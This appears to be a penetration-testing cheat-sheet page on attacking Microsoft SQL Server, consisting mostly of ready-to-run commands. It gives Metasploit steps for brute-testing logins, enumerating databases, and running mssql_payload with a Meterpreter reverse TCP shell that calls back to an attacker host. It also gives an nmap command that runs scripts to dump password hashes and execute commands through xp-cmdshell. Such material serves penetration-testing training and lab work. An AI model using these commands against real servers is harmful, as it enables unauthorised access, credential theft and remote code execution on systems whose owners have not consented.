> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/initial-access/services/sql.md).

# SQL

### Test creds&#x20;

`msf> use auxiliary/scanner/mssql/mssql_login`&#x20;

`set rhosts 172.16.64.199 set rport 1433 set username fooadmin set password fooadmin set verbose true`&#x20;

`run` //looking for it to say success but will never give us a shell

### Show DBs and info:&#x20;

`msf> use auxiliary/admin/mssql/mssql_enum`&#x20;

`set rhosts 172.16.64.199 set rport 1433 set username fooadmin set password fooadmin set verbose true`&#x20;

`run` //we want to keep an eye out to see if we are an admin user and if cmd or remote access are enabled

msf> use exploit/windows/mssql/mssql\_payload&#x20;

set rhosts 172.16.64.199 set rport 1433 set srvport 53 set username fooadmin set password fooadmin set verbose true&#x20;

set payload windows/x64/meterpreter\_reverse\_tcp&#x20;

set lhost 172.16.64.10 set lport 1234&#x20;

run //wait for the shell to push then we can do a 'getuid' to see if it worked.

//shell msf>shell //will then spawn our shell into the msql box

### #nmap --script-help "*ms* and *sql*"

broadcast-ms-sql-discover ms-sql-brute ms-sql-config ms-sql-dac ms-sql-dump-hashes ms-sql-empty-password ms-sql-hasdbaccess ms-sql-info ms-sql-ntlm-info ms-sql-query ms-sql-tables ms-sql-xp-cmdshell

\#nmap --script -sV -p 1433

EX: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433
